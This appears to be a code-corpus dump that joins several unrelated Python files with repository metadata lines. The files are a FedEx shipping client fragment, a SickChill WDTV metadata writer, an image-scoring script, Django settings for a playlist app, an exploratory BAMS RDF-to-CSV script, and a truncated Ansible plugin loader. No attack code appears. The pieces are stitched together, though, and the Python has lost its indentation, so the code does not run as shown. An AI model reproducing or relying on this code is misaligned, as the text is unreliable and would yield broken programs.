request.RequestedShipment.Recipient.Contact.PersonName = recipient.name or recipient.company_name
request.RequestedShipment.Recipient.Contact.CompanyName = recipient.company_name or ''
request.RequestedShipment.Recipient.Contact.PhoneNumber = recipient.phone
# Recipient address
request.RequestedShipment.Recipient.Address.StreetLines = [recipient.address1, recipient.address2]
request.RequestedShipment.Recipient.Address.City = recipient.city
request.RequestedShipment.Recipient.Address.StateOrProvinceCode = recipient.state
request.RequestedShipment.Recipient.Address.PostalCode = recipient.zip
request.RequestedShipment.Recipient.Address.CountryCode = recipient.country_code
# This is needed to ensure an accurate rate quote with the response.
request.RequestedShipment.Recipient.Address.Residential = recipient.is_residence
request.RequestedShipment.EdtRequestType = 'NONE'
# Who pays for the shipment?
# RECIPIENT, SENDER or THIRD_PARTY
request.RequestedShipment.ShippingChargesPayment.PaymentType = 'SENDER'
wsdl_package = request.create_wsdl_object_of_type('RequestedPackageLineItem')
wsdl_package.PhysicalPackaging = 'BOX'
wsdl_package.Weight = request.create_wsdl_object_of_type('Weight')
wsdl_package.Weight.Value = round(package.weight_in_lbs, 2)
wsdl_package.Weight.Units = 'LB'
#wsdl_package.Dimensions = request.create_wsdl_object_of_type('Dimensions')
#wsdl_package.Dimensions.Length = package.length
#wsdl_package.Dimensions.Width = package.width
#wsdl_package.Dimensions.Height = package.height
#wsdl_package.Dimensions.Units = 'IN'
request.add_package(wsdl_package)
return request
def rate(self, package, shipper, recipient, insurance='OFF', insurance_amount=0, delivery_confirmation=False, signature_confirmation=False):
response = {'info': []}
# Play nice with the other function signatures, which expect to take lists of packages.
if not isinstance(package, Package):
# But not too nice.
if len(package) > 1:
raise Exception("Can only take one Package at a time!")
package = package[0]
shipper.country_code = get_country_code(shipper.country)
recipient.country_code = get_country_code(recipient.country)
rate_request = FedexRateServiceRequest(self.config)
rate_request = self._prepare_request(rate_request, shipper, recipient, package)
rate_request.RequestedShipment.ServiceType = None
rate_request.RequestedShipment.EdtRequestType = 'NONE'
rate_request.RequestedShipment.PackageDetail = 'INDIVIDUAL_PACKAGES'
rate_request.RequestedShipment.ShippingChargesPayment.Payor.AccountNumber = self.config.account_number
seen_quotes = []
try:
rate_request.send_request()
for service in rate_request.response.RateReplyDetails:
for detail in service.RatedShipmentDetails:
response['info'].append({
'service': service.ServiceType,
'package': service.PackagingType,
'delivery_day': '',
'cost': float(detail.ShipmentRateDetail.TotalNetFedExCharge.Amount)
})
except Exception as e:
raise FedExError(e)
return response
def label(self, package, shipper, recipient, customs=None, image_format="PNG"):
shipper.country_code = get_country_code(shipper.country)
recipient.country_code = get_country_code(recipient.country)
shipment = self._prepare_request(FedexProcessShipmentRequest(self.config), shipper, recipient, package)
shipment.RequestedShipment.ServiceType = package.mail_class
shipment.RequestedShipment.ShippingChargesPayment.Payor.ResponsibleParty.AccountNumber = self.config.account_number
# Specifies the label type to be returned.
# LABEL_DATA_ONLY or COMMON2D
shipment.RequestedShipment.LabelSpecification.LabelFormatType = 'COMMON2D'
# Specifies which format the label file will be sent to you in.
# DPL, EPL2, PDF, PNG, ZPLII
shipment.RequestedShipment.LabelSpecification.ImageType = image_format
shipment.RequestedShipment.LabelSpecification.LabelStockType = 'STOCK_4X6' if image_format == 'EPL2' else 'PAPER_4X6'
shipment.RequestedShipment.LabelSpecification.LabelPrintingOrientation = 'BOTTOM_EDGE_OF_TEXT_FIRST'
if customs:
customs_label = shipment.create_wsdl_object_of_type('AdditionalLabelsDetail')
customs_label.Type = 'CUSTOMS'
customs_label.Count = 1
shipment.AdditionalLabels.append(customs_label)
wsdl_customs = shipment.create_wsdl_object_of_type('CustomsClearanceDetail')
wsdl_customs.CustomsValue = shipment.create_wsdl_object_of_type('Money')
wsdl_customs.CustomsValue.Currency = 'USD'
wsdl_customs.CustomsValue.Amount = package.value
for item in sorted(customs.items, key=lambda i: i.value, reverse=True):
wsdl_item = shipment.create_wsdl_object_of_type('Commodity')
wsdl_item.CustomsValue = shipment.create_wsdl_object_of_type('Money')
wsdl_item.CustomsValue.Amount = item.value
wsdl_item.CustomsValue.Currency = 'USD'
wsdl_item.NumberOfPieces = item.quantity
wsdl_item.CountryOfManufacture = item.country_of_origin
wsdl_item.Description = item.description
wsdl_item.Weight = round(item.weight, 2)
wsdl_customs.Commodities.append(wsdl_item)
shipment.CustomsClearanceDetail = wsdl_customs
try:
shipment.send_request()
except Exception as e:
return {"error": str(e)}
tracking = shipment.response.CompletedShipmentDetail.CompletedPackageDetails[0].TrackingIds[0].TrackingNumber
net_cost = shipment.response.CompletedShipmentDetail.CompletedPackageDetails[0].PackageRating.PackageRateDetails[0].NetCharge.Amount
return Label(
postage=net_cost, tracking=tracking, format=[image_format],
label=[base64.b64decode(shipment.response.CompletedShipmentDetail.CompletedPackageDetails[0].Label.Parts[0].Image)]
)
def cancel(self, tracking_no, **kwargs):
delete = FedexDeleteShipmentRequest(self.config)
delete.DeletionControlType = "DELETE_ALL_PACKAGES"
delete.TrackingId.TrackingNumber = tracking_no
try:
delete.send_request()
return delete.response
except Exception as e:
raise FedExError(e) | agpl-3.0 | 4,817,629,897,485,987,000 | 44.798969 | 144 | 0.688766 | false | 3.937943 | true | false | false |
Vagab0nd/SiCKRAGE | sickchill/providers/metadata/wdtv.py | 1 | 8505 | import datetime
import os
import re
from xml.etree import ElementTree
from sickchill.helper.common import dateFormat, replace_extension
from sickchill.oldbeard import helpers
from ... import logger
from . import generic
class WDTVMetadata(generic.GenericMetadata):
"""
Metadata generation class for WDTV
The following file structure is used:
show_root/folder.jpg (poster)
show_root/Season ##/folder.jpg (season thumb)
show_root/Season ##/filename.ext (*)
show_root/Season ##/filename.metathumb (episode thumb)
show_root/Season ##/filename.xml (episode metadata)
"""
def __init__(
self, show_metadata=False, episode_metadata=False, fanart=False, poster=False, banner=False, episode_thumbnails=False,
season_posters=False, season_banners=False, season_all_poster=False, season_all_banner=False
):
super().__init__(
show_metadata, episode_metadata, fanart, poster, banner, episode_thumbnails, season_posters, season_banners, season_all_poster, season_all_banner
)
self.name = 'WDTV'
self._ep_nfo_extension = 'xml'
self.poster_name = "folder.jpg"
# web-ui metadata template
self.eg_show_metadata = "<i>not supported</i>"
self.eg_episode_metadata = "Season##\\<i>filename</i>.xml"
self.eg_fanart = "<i>not supported</i>"
self.eg_poster = "folder.jpg"
self.eg_banner = "<i>not supported</i>"
self.eg_episode_thumbnails = "Season##\\<i>filename</i>.metathumb"
self.eg_season_posters = "Season##\\folder.jpg"
self.eg_season_banners = "<i>not supported</i>"
self.eg_season_all_poster = "<i>not supported</i>"
self.eg_season_all_banner = "<i>not supported</i>"
# Override with empty methods for unsupported features
def retrieveShowMetadata(self, folder):
# no show metadata generated, we abort this lookup function
return None, None, None
def create_show_metadata(self, show_obj):
pass
def update_show_indexer_metadata(self, show_obj):
pass
def get_show_file_path(self, show_obj):
pass
def create_fanart(self, show_obj):
pass
def create_banner(self, show_obj):
pass
def create_season_banners(self, show_obj):
pass
def create_season_all_poster(self, show_obj):
pass
def create_season_all_banner(self, show_obj):
pass
@staticmethod
def get_episode_thumb_path(ep_obj):
"""
Returns the path where the episode thumbnail should be stored. Defaults to
the same path as the episode file but with a .metathumb extension.
ep_obj: a TVEpisode instance for which to create the thumbnail
"""
if os.path.isfile(ep_obj.location):
tbn_filename = replace_extension(ep_obj.location, 'metathumb')
else:
return None
return tbn_filename
@staticmethod
def get_season_poster_path(show_obj, season):
"""
Season thumbs for WDTV go in Show Dir/Season X/folder.jpg
If no season folder exists, None is returned
"""
dir_list = [x for x in os.listdir(show_obj.location) if
os.path.isdir(os.path.join(show_obj.location, x))]
season_dir_regex = r'^Season\s+(\d+)$'
season_dir = None
for cur_dir in dir_list:
if season == 0 and cur_dir == "Specials":
season_dir = cur_dir
break
match = re.match(season_dir_regex, cur_dir, re.I)
if not match:
continue
cur_season = int(match.group(1))
if cur_season == season:
season_dir = cur_dir
break
if not season_dir:
logger.debug("Unable to find a season dir for season " + str(season))
return None
logger.debug("Using " + str(season_dir) + "/folder.jpg as season dir for season " + str(season))
return os.path.join(show_obj.location, season_dir, 'folder.jpg')
def _ep_data(self, ep_obj):
"""
Creates an elementTree XML structure for a WDTV style episode.xml
and returns the resulting data object.
ep_obj: a TVShow instance to create the NFO for
"""
eps_to_write = [ep_obj] + ep_obj.relatedEps
myShow = ep_obj.idxr.series_from_episode(ep_obj)
rootNode = ElementTree.Element("details")
# write an WDTV XML containing info for all matching episodes
for curEpToWrite in eps_to_write:
myEp = curEpToWrite.idxr.episode(curEpToWrite)
if not myEp:
logger.info("Metadata writer is unable to find episode {0:d}x{1:d} of {2} on {3}..."
"has it been removed? Should I delete from db?".format(
curEpToWrite.season, curEpToWrite.episode, curEpToWrite.show.name, ep_obj.idxr.name))
return None
if ep_obj.airdate != datetime.date.min and not myEp.get('firstAired'):
myEp["firstAired"] = str(ep_obj.airdate)
if not (myEp.get('episodeName') and myEp.get('firstAired')):
return None
if len(eps_to_write) > 1:
episode = ElementTree.SubElement(rootNode, "details")
else:
episode = rootNode
if myEp.get('id'):
episodeID = ElementTree.SubElement(episode, "id")
episodeID.text = str(myEp['id'])
title = ElementTree.SubElement(episode, "title")
title.text = ep_obj.pretty_name()
if getattr(myShow, 'seriesName', None):
seriesName = ElementTree.SubElement(episode, "series_name")
seriesName.text = myShow.seriesName
if curEpToWrite.name:
episodeName = ElementTree.SubElement(episode, "episode_name")
episodeName.text = curEpToWrite.name
seasonNumber = ElementTree.SubElement(episode, "season_number")
seasonNumber.text = str(curEpToWrite.season)
episodeNum = ElementTree.SubElement(episode, "episode_number")
episodeNum.text = str(curEpToWrite.episode)
firstAired = ElementTree.SubElement(episode, "firstAired")
if curEpToWrite.airdate != datetime.date.min:
firstAired.text = str(curEpToWrite.airdate)
if getattr(myShow, 'firstAired', None):
try:
year_text = str(datetime.datetime.strptime(myShow.firstAired, dateFormat).year)
if year_text:
year = ElementTree.SubElement(episode, "year")
year.text = year_text
except Exception:
pass
if curEpToWrite.season != 0 and getattr(myShow, 'runtime', None):
runtime = ElementTree.SubElement(episode, "runtime")
runtime.text = myShow.runtime
if getattr(myShow, 'genre', None):
genre = ElementTree.SubElement(episode, "genre")
genre.text = " / ".join(myShow.genre)
if myEp.get('directors') and isinstance(myEp['directors'], list):
for director in myEp['directors']:
director_element = ElementTree.SubElement(episode, "director")
director_element.text = director
data = ep_obj.idxr.actors(myShow)
for actor in data:
if not ('name' in actor and actor['name'].strip()):
continue
cur_actor = ElementTree.SubElement(episode, "actor")
cur_actor_name = ElementTree.SubElement(cur_actor, "name")
cur_actor_name.text = actor['name']
if 'role' in actor and actor['role'].strip():
cur_actor_role = ElementTree.SubElement(cur_actor, "role")
cur_actor_role.text = actor['role'].strip()
if curEpToWrite.description:
overview = ElementTree.SubElement(episode, "overview")
overview.text = curEpToWrite.description
# Make it purdy
helpers.indentXML(rootNode)
data = ElementTree.ElementTree(rootNode)
return data
# present a standard "interface" from the module
metadata_class = WDTVMetadata
| gpl-3.0 | -1,577,157,463,934,966,500 | 34 | 157 | 0.585303 | false | 4.055794 | false | false | false |
domoritz/label_generator | rate.py | 1 | 3246 | """Calculate the difference between predictions and ground truth.
Provide a list of predicted files. In the same directory should
also be the label files. This script assumes correct filenames.
Usage:
main.py LIST [--thresh=THRESH] [--debug]
main.py (-h | --help)
main.py --version
Options:
--thresh=THRESH Threshold for predicted image [default: 200].
--debug Write debug output.
-h --help Show this screen.
--version Show version.
"""
import logging
import os.path
import numpy as np
import cv2
from docopt import docopt
DEBUG = False
def calculate_diff(label_list, thresh):
with open(label_list) as f:
all_fp = 0.0
all_fn = 0.0
all_tp = 0.0
where = os.path.dirname(label_list)
for line in f:
pred = os.path.join(where, line.strip())
fname = os.path.basename(
pred)[:-14] + "-label.png"
truth = os.path.join(where, fname)
if not os.path.isfile(pred) or not os.path.isfile(truth):
print("Not found:", pred, truth)
continue
truth = cv2.imread(truth, cv2.CV_LOAD_IMAGE_GRAYSCALE)
pred = cv2.imread(pred, cv2.CV_LOAD_IMAGE_GRAYSCALE)
# resize to predicted image size
h, w = pred.shape
truth = cv2.resize(truth, (w, h))
# threshold to get bw image
_, pred = cv2.threshold(pred, thresh, 255, cv2.THRESH_BINARY)
# threshold because of scaling interpolation
_, truth = cv2.threshold(truth, 127, 255, cv2.THRESH_BINARY)
# dilate to account for almost right predictions (see alternative below)
kernel = np.ones((3, 3), np.uint8)
truth_dil = cv2.dilate(truth, kernel, iterations=3)
pred_dil = cv2.dilate(pred, kernel, iterations=3)
# no dilation
# truth_dil = truth
# pred_dil = pred
fp = np.sum(pred - truth_dil)
fn = np.sum(truth - pred_dil)
tp = np.sum(cv2.bitwise_and(pred, truth))
all_fp += fp
all_fn += fn
all_tp += tp
if DEBUG:
print(fn, fp, tp)
cv2.imshow('truth', truth)
cv2.imshow('predicted', pred)
cv2.imshow('fp', pred - truth_dil)
cv2.imshow('fn', truth - pred_dil)
cv2.imshow('tp', cv2.bitwise_and(pred, truth))
cv2.moveWindow('truth', 100, 10)
cv2.moveWindow('predicted', 300, 10)
cv2.waitKey(0)
cv2.destroyAllWindows()
print("Shape:", h, w)
print(all_fp, all_fn, all_tp)
precision = all_tp / (all_tp + all_fp)
recall = all_tp / (all_tp + all_fn)
print("Precision:", precision)
print("Recall:", recall)
print("F1 score:", 2 * precision * recall / (precision + recall))
if __name__ == '__main__':
arguments = docopt(__doc__, version='Tester 1.0')
if arguments['--debug']:
logging.basicConfig(level=logging.DEBUG)
DEBUG = True
calculate_diff(arguments['LIST'],
int(arguments['--thresh']))
| bsd-3-clause | 4,731,531,660,132,277,000 | 28.243243 | 84 | 0.544054 | false | 3.783217 | false | false | false |
CorneliusIV/playlistdc | playlistdc/settings.py | 1 | 3770 | """
Django settings for playlistdc project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
"""
import os
import dj_database_url
from decouple import config
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
PROJECT_ROOT = os.path.dirname(BASE_DIR)
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = config('SECRET_KEY')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = config('DEBUG', default=True, cast=bool)
ALLOWED_HOSTS = config('ALLOWED_HOSTS', default='',
cast=lambda v: [s.strip() for s in v.split(',')])
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django_rq',
'playlistdc'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
if config('DEBUG', cast=bool, default=DEBUG):
INSTALLED_APPS.extend([
'debug_toolbar',
])
MIDDLEWARE.append(
'debug_toolbar.middleware.DebugToolbarMiddleware')
ROOT_URLCONF = 'playlistdc.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
'debug': config('TEMPLATE_DEBUG', default=DEBUG, cast=bool),
},
},
]
WSGI_APPLICATION = 'playlistdc.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
DATABASES = {
'default': dj_database_url.config(conn_max_age=600),
}
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'en-us'
USE_I18N = True
TIME_ZONE = 'America/New_York'
USE_L10N = False
USE_TZ = False
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.7/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'public', 'static')
STATICFILES_STORAGE = 'whitenoise.django.GzipManifestStaticFilesStorage'
# Media
MEDIA_ROOT = os.path.join(BASE_DIR, 'public', 'media')
# SSL
SECURE_SSL_REDIRECT = config('SECURE_SSL_REDIRECT', default=False, cast=bool)
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
SESSION_COOKIE_SECURE = SECURE_SSL_REDIRECT
CSRF_COOKIE_SECURE = SECURE_SSL_REDIRECT
# rq
RQ_QUEUES = {
'default': {
'URL': config('REDIS_URL', default='redis://localhost:6379/0'),
},
'high': {
'URL': config('REDIS_URL', default='redis://localhost:6379/0'),
},
'low': {
'URL': config('REDIS_URL', default='redis://localhost:6379/0'),
},
}
# Spotify
SPOTIPY_CLIENT_ID = config('SPOTIPY_CLIENT_ID')
SPOTIPY_CLIENT_SECRET = config('SPOTIPY_CLIENT_SECRET')
SPOTIPY_REDIRECT_URI = config('SPOTIPY_REDIRECT_URI')
| mit | -3,622,044,227,207,103,500 | 25.180556 | 77 | 0.680637 | false | 3.402527 | true | false | false |
rsoscia/BAMS-to-NeuroLex | src/ProgressReport.py | 1 | 7486 | # ProgressReport.py
# Progress Report For Zaid
#This is an all encompassing program that does everything at once, hopefully placing all
#of the BAMS query results into a single CSV file
#doesn't run properly unless the path is accessed first, interactive python is activated,
#and the code is pasted into terminal..
#Only run the below persist section once:
#Persist Begin
#For Parsing
import rdflib
from rdflib import plugin
#for getting the length of the files
import os
#for working with tempfiles
import os.path as op
import tempfile
#For Unzipping
import zipfile
from StringIO import StringIO
plugin.register(
'sparql', rdflib.query.Processor,
'rdfextras.sparql.processor', 'Processor')
plugin.register(
'sparql', rdflib.query.Result,
'rdfextras.sparql.query', 'SPARQLQueryResult')
zipdata = StringIO()
# open the file using a relative path
#r = open("../Data/BAMS1.zip")
# adding the BAMS Thesaurus instead of the more limited set of data:
#r = open("../Data/bams_thesaurus_2013-09-24_17-12-40.xml.zip")
# Fixed RDF
r = open("../Data/bams_thesaurus_2013-10-06_14-58-56.xml.zip")
#ADDITIONAL CONTENT
#r = open("../Data/bams_ontology_2013-10-16_20-34-52.xml.zip")
# zipdata is a buffer holding the contents of the zip file in memory
zipdata.write(r.read())
print("~40 seconds for zip to open...")
#myzipfile opens the contents of the zip file as an object that knows how to unzip
myzipfile = zipfile.ZipFile(zipdata)
#grab the contents out of myzipfile by name
#foofile = myzipfile.open('bams_ontology_2013-07-10_03-20-00.xml')
#changing the foofile to be the file we upen above^^^^^ in r = open()....etc.
#foofile = myzipfile.open('bams_thesaurus_2013-09-24_17-12-40.xml')
# Fixed RDF
foofile = myzipfile.open('bams_thesaurus_2013-10-06_14-58-56.xml')
#ADDITIONAL CONTENT
#foofile = myzipfile.open('bams_ontology_2013-10-16_20-34-52.xml')
print("loading up the BAMS file in memory...")
#Get a Graph object using a Sleepycat persistent store
g = rdflib.Graph('Sleepycat',identifier='BAMS')
# first time create the store
# put the store in a temp directory so it doesn't get confused with stuff we should commit
tempStore = op.join( tempfile.gettempdir(), 'myRDF_BAMS_Store')
g.open(tempStore, create = True)
#pull in the BAMS RDF document, parse, and store.
#result = g.parse(file=myzipfile.open('bams_ontology_2013-07-10_03-20-00.xml'), format="application/rdf+xml")
#do the same thing but with the BAMS thesaurus file
#result = g.parse(file=myzipfile.open('bams_thesaurus_2013-09-24_17-12-40.xml'), format="application/rdf+xml")
# Fixed RDF
result = g.parse(file=myzipfile.open('bams_thesaurus_2013-10-06_14-58-56.xml'), format="application/rdf+xml")
#ADDITIONAL CONTENT
#result = g.parse(file=myzipfile.open('bams_ontology_2013-10-16_20-34-52.xml'), format="application/rdf+xml")
foofile.close()
# when done!
g.close()
print("Graph stored to disk")
#WORKS PERFECTLY
#Persist End
#########################################################################################
#For Parsing
import rdflib
from rdflib import plugin
#for getting the length of the files
import os
#for working with tempfiles
import os.path as op
import tempfile
#for csv output
import csv
plugin.register(
'sparql', rdflib.query.Processor,
'rdfextras.sparql.processor', 'Processor')
plugin.register(
'sparql', rdflib.query.Result,
'rdfextras.sparql.query', 'SPARQLQueryResult')
#Get a Graph object
g = rdflib.Graph('Sleepycat',identifier='BAMS')
print("loading up the BAMS file in memory...")
# assumes myRDF_BAMS_Store has been created
tempStore = op.join( tempfile.gettempdir(), 'myRDF_BAMS_Store')
g.open(tempStore)
print("going to get results...")
print("The graph has " + str(len(g)) + " items in it")
#BAMS Thesaurus content has 3797 items in it
#additional BAMS content (graph) has 167178 items in it
# CHOOSE ONE OF THE FOLLOWING QUERIES
#########################################################################################
#BASAL GANGLIA OF TELENCEPHALON QUERY:
qres = g.query(
"""PREFIX bamsProp: <http://brancusi1.usc.edu/RDF/>
SELECT ?subject ?predicate ?object
WHERE {
?subject bamsProp:entry "Basal ganglia of telencephalon" .
?subject ?predicate ?object
}""")
#########################################################################################
#// Basal Ganglia Query:
#// Good For Testing Purposes
#BASAL GANGLIA QUERY:
qres = g.query(
"""PREFIX bamsProp: <http://brancusi1.usc.edu/RDF/>
SELECT ?subject ?predicate ?object
WHERE {
?subject bamsProp:entry "Basal ganglia" .
?subject ?predicate ?object
}""")
for r in qres.result:
print str(r[0]), str(r[1]), str(r[2])
# Open/Write CSV file
# (Copy) Experimental -- best working yet
#########################################################################################
with open('Progress_Report.csv', 'wb') as f:
BAMS_Dict = {"Subject": qres.result[0][0], "Predicate": qres.result[0][1], "Object": qres.result[0][2]}
w = csv.DictWriter(f, BAMS_Dict.keys())
w.writeheader()
w.writerow(BAMS_Dict)
for r in qres.result:
c = csv.writer(open("Progress_Report.csv","wb"))
c.writerows(qres.result)
#########################################################################################
# CSV File Generated Containing BAMS Data From Queries
#########################################################################################
for r in qres.result:
#print str(r[0]), str(r[1]), str(r[2])
#print str(r[0][0]) #gives the first position in the first tripple "h" for the url
#c = csv.writer(open("BAMS_Thesaurus_Data4Upload.csv","wb"))
c = csv.writer(open("BAMS_Formatted_Data.csv","wb"))
c.writerows(qres.result)
# skip a row
# open the file
# allow program to enter loop and continue to open and insert data into the file
# Experimental -- best working yet
#########################################################################################
with open('BAMS_Formatted_Data.csv', 'wb') as f:
BAMS_Dict = {"Subject": qres.result[0][0], "Predicate": qres.result[0][1], "Object": qres.result[0][2]}
w = csv.DictWriter(f, BAMS_Dict.keys())
w.writeheader()
w.writerow(BAMS_Dict)
for r in qres.result:
c = csv.writer(open("BAMS_Formatted_Data.csv","wb"))
c.writerows(qres.result)
#w.writerows(qres.result)
#########################################################################################
#########################################################################################
#with open('mycsvfileV1.csv', 'wb') as f: # Just use 'w' mode in 3.x
with open('BAMS_Formatted_Data.csv', 'wb') as f: # Just use 'w' mode in 3.x
#First Entire Triple, Second Entire Triple, Third Entire Triple.....
#BAMS_Dict = {"Subject": qres.result[0], "Predicate": qres.result[1], "Object": qres.result[2]}
#Subject Of First Triple, Predicate Of First Triple, Object Of First Triple.....
BAMS_Dict = {"Subject": qres.result[0][0], "Predicate": qres.result[0][1], "Object": qres.result[0][2]}
w = csv.DictWriter(f, BAMS_Dict.keys())
w.writeheader()
w.writerow(BAMS_Dict)
#Check To See If A DictWriter Library Of Some Sort Is Required For Access To These Methods
#for row in BAMS_DICT:
#out_f.write("%s%s" %(delimiter.join([row[name] for name in f]), lineterminator))
#Left off with this vvvvvvvvvv
#DictWriter.writerows(...) | mit | 5,022,078,696,733,141,000 | 25.644128 | 110 | 0.62303 | false | 3.173379 | false | false | false |
kapilt/ansible | lib/ansible/plugins/__init__.py | 24 | 15677 | # (c) 2012, Daniel Hokka Zakrisson <[email protected]>
# (c) 2012-2014, Michael DeHaan <[email protected]> and others
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import glob
import imp
import inspect
import os
import os.path
import sys
import warnings
from collections import defaultdict
from ansible import constants as C
try:
from __main__ import display
except ImportError:
from ansible.utils.display import Display
display = Display()
# Global so that all instances of a PluginLoader will share the caches
MODULE_CACHE = {}
PATH_CACHE = {}
PLUGIN_PATH_CACHE = {}
def get_all_plugin_loaders():
return [(name, obj) for (name, obj) in inspect.getmembers(sys.modules[__name__]) if isinstance(obj, PluginLoader)]
class PluginLoader:
'''
PluginLoader loads plugins from the configured plugin directories.
It searches for plugins by iterating through the combined list of
play basedirs, configured paths, and the python path.
The first match is used.
'''
def __init__(self, class_name, package, config, subdir, aliases={}, required_base_class=None):
self.class_name = class_name
self.base_class = required_base_class
self.package = package
self.config = config
self.subdir = subdir
self.aliases = aliases
if not class_name in MODULE_CACHE:
MODULE_CACHE[class_name] = {}
if not class_name in PATH_CACHE:
PATH_CACHE[class_name] = None
if not class_name in PLUGIN_PATH_CACHE:
PLUGIN_PATH_CACHE[class_name] = defaultdict(dict)
self._module_cache = MODULE_CACHE[class_name]
self._paths = PATH_CACHE[class_name]
self._plugin_path_cache = PLUGIN_PATH_CACHE[class_name]
self._extra_dirs = []
self._searched_paths = set()
def __setstate__(self, data):
'''
Deserializer.
'''
class_name = data.get('class_name')
package = data.get('package')
config = data.get('config')
subdir = data.get('subdir')
aliases = data.get('aliases')
base_class = data.get('base_class')
PATH_CACHE[class_name] = data.get('PATH_CACHE')
PLUGIN_PATH_CACHE[class_name] = data.get('PLUGIN_PATH_CACHE')
self.__init__(class_name, package, config, subdir, aliases, base_class)
self._extra_dirs = data.get('_extra_dirs', [])
self._searched_paths = data.get('_searched_paths', set())
def __getstate__(self):
'''
Serializer.
'''
return dict(
class_name = self.class_name,
base_class = self.base_class,
package = self.package,
config = self.config,
subdir = self.subdir,
aliases = self.aliases,
_extra_dirs = self._extra_dirs,
_searched_paths = self._searched_paths,
PATH_CACHE = PATH_CACHE[self.class_name],
PLUGIN_PATH_CACHE = PLUGIN_PATH_CACHE[self.class_name],
)
def print_paths(self):
''' Returns a string suitable for printing of the search path '''
# Uses a list to get the order right
ret = []
for i in self._get_paths():
if i not in ret:
ret.append(i)
return os.pathsep.join(ret)
def _all_directories(self, dir):
results = []
results.append(dir)
for root, subdirs, files in os.walk(dir):
if '__init__.py' in files:
for x in subdirs:
results.append(os.path.join(root,x))
return results
def _get_package_paths(self):
''' Gets the path of a Python package '''
paths = []
if not self.package:
return []
if not hasattr(self, 'package_path'):
m = __import__(self.package)
parts = self.package.split('.')[1:]
self.package_path = os.path.join(os.path.dirname(m.__file__), *parts)
paths.extend(self._all_directories(self.package_path))
return paths
def _get_paths(self):
''' Return a list of paths to search for plugins in '''
if self._paths is not None:
return self._paths
ret = self._extra_dirs[:]
# look in any configured plugin paths, allow one level deep for subcategories
if self.config is not None:
configured_paths = self.config.split(os.pathsep)
for path in configured_paths:
path = os.path.realpath(os.path.expanduser(path))
contents = glob.glob("%s/*" % path) + glob.glob("%s/*/*" % path)
for c in contents:
if os.path.isdir(c) and c not in ret:
ret.append(c)
if path not in ret:
ret.append(path)
# look for any plugins installed in the package subtree
ret.extend(self._get_package_paths())
# HACK: because powershell modules are in the same directory
# hierarchy as other modules we have to process them last. This is
# because powershell only works on windows but the other modules work
# anywhere (possibly including windows if the correct language
# interpreter is installed). the non-powershell modules can have any
# file extension and thus powershell modules are picked up in that.
# The non-hack way to fix this is to have powershell modules be
# a different PluginLoader/ModuleLoader. But that requires changing
# other things too (known thing to change would be PATHS_CACHE,
# PLUGIN_PATHS_CACHE, and MODULE_CACHE. Since those three dicts key
# on the class_name and neither regular modules nor powershell modules
# would have class_names, they would not work as written.
reordered_paths = []
win_dirs = []
for path in ret:
if path.endswith('windows'):
win_dirs.append(path)
else:
reordered_paths.append(path)
reordered_paths.extend(win_dirs)
# cache and return the result
self._paths = reordered_paths
return reordered_paths
def add_directory(self, directory, with_subdir=False):
''' Adds an additional directory to the search path '''
directory = os.path.realpath(directory)
if directory is not None:
if with_subdir:
directory = os.path.join(directory, self.subdir)
if directory not in self._extra_dirs:
# append the directory and invalidate the path cache
self._extra_dirs.append(directory)
self._paths = None
def find_plugin(self, name, mod_type=''):
''' Find a plugin named name '''
if mod_type:
suffix = mod_type
elif self.class_name:
# Ansible plugins that run in the controller process (most plugins)
suffix = '.py'
else:
# Only Ansible Modules. Ansible modules can be any executable so
# they can have any suffix
suffix = ''
# The particular cache to look for modules within. This matches the
# requested mod_type
pull_cache = self._plugin_path_cache[suffix]
try:
return pull_cache[name]
except KeyError:
# Cache miss. Now let's find the plugin
pass
# TODO: Instead of using the self._paths cache (PATH_CACHE) and
# self._searched_paths we could use an iterator. Before enabling that
# we need to make sure we don't want to add additional directories
# (add_directory()) once we start using the iterator. Currently, it
# looks like _get_paths() never forces a cache refresh so if we expect
# additional directories to be added later, it is buggy.
for path in (p for p in self._get_paths() if p not in self._searched_paths and os.path.isdir(p)):
try:
full_paths = (os.path.join(path, f) for f in os.listdir(path))
except OSError as e:
display.warning("Error accessing plugin paths: %s" % str(e))
for full_path in (f for f in full_paths if os.path.isfile(f) and not f.endswith('__init__.py')):
full_name = os.path.basename(full_path)
# HACK: We have no way of executing python byte
# compiled files as ansible modules so specifically exclude them
if full_path.endswith(('.pyc', '.pyo')):
continue
splitname = os.path.splitext(full_name)
